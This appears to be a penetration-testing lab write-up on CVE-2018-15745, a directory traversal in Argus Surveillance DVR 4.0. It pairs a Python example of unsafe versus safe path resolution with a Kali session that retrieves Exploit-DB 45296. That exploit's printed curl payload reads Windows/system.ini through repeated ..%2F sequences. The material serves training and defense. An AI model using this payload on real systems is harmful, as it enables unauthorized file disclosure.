CVE-2018-15745
The target Argus Surveillance DVR instance is vulnerable to CVE-2018-15745 because it runs the outdated version 4.0.
A vulnerability has been found in Argus Surveillance DVR 4.0.0.0 and classified as critical. It affects some unknown processing in the file WEBACCOUNT.CGI: manipulating the argument RESULTPAGE with the input value ..%2F leads to a path traversal vulnerability. The CWE definition for the vulnerability is CWE-22: the product uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but it does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside of the restricted directory. The known impact is on confidentiality and integrity.
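The following is an added illustration (not code from the advisory, the exploit author or the vendor) of the CWE-22 mechanism described above: decoding the RESULTPAGE value once and joining it onto a base directory without a containment check lets a run of ..%2F sequences resolve to a file outside that directory, while canonicalizing and then checking the prefix rejects it. The web root path and the request URLs are constructed for the example.

```python
from urllib.parse import unquote, urlsplit
import posixpath

# Constructed placeholder for the directory WEBACCOUNT.CGI is meant to serve
# pages from; it is not the product's real install path.
WEBROOT = "/srv/dvr/webroot"

def raw_query_param(url, name):
    """Return the still-percent-encoded value of `name` from the URL query, or None."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None

def naive_resolve(webroot, resultpage):
    """The vulnerable pattern: decode once, join onto the web root, normalize, no check.
    Backslashes are folded to '/' because the target is a Windows product."""
    decoded = unquote(resultpage).replace("\\", "/")
    return posixpath.normpath(posixpath.join(webroot, decoded))

def safe_resolve(webroot, resultpage):
    """Canonicalize first, then require the result to stay under the web root.
    Returns the resolved path, or None when the request must be rejected."""
    root = posixpath.normpath(webroot)
    candidate = naive_resolve(root, resultpage)
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None

if __name__ == "__main__":
    # Constructed request shaped like the advisory's PoC (16 traversal steps).
    poc = ("http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE="
           + "..%2F" * 16 + "Windows%2Fsystem.ini&USEREDIRECT=1")
    value = raw_query_param(poc, "RESULTPAGE")
    print("naive:", naive_resolve(WEBROOT, value))   # escapes to /Windows/system.ini
    print("safe :", safe_resolve(WEBROOT, value))    # None: rejected
    print("safe :", safe_resolve(WEBROOT, "login.htm"))
```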
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ searchsploit -m windows_x86/webapps/45296.txt ; mv 45296.txt CVE-2018-15745.txt
Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
URL: https://www.exploit-db.com/exploits/45296
Path: /usr/share/exploitdb/exploits/windows_x86/webapps/45296.txt
Codes: CVE-2018-15745
Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/dvr4/45296.txt
Exploit locally available
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ cat CVE-2018-15745.txt
# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
# Author: John Page (aka hyp3rlinx)
# Date: 2018-08-28
# Vendor: www.argussurveillance.com
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
# CVE: N/A
# Description:
# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal,
# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
# PoC
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
# Result:
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
wave=mmdrv.dll
timer=timer.drv
# https://vimeo.com/287115273
# Greetz: ***Greetz: indoushka | Eduardo | GGA***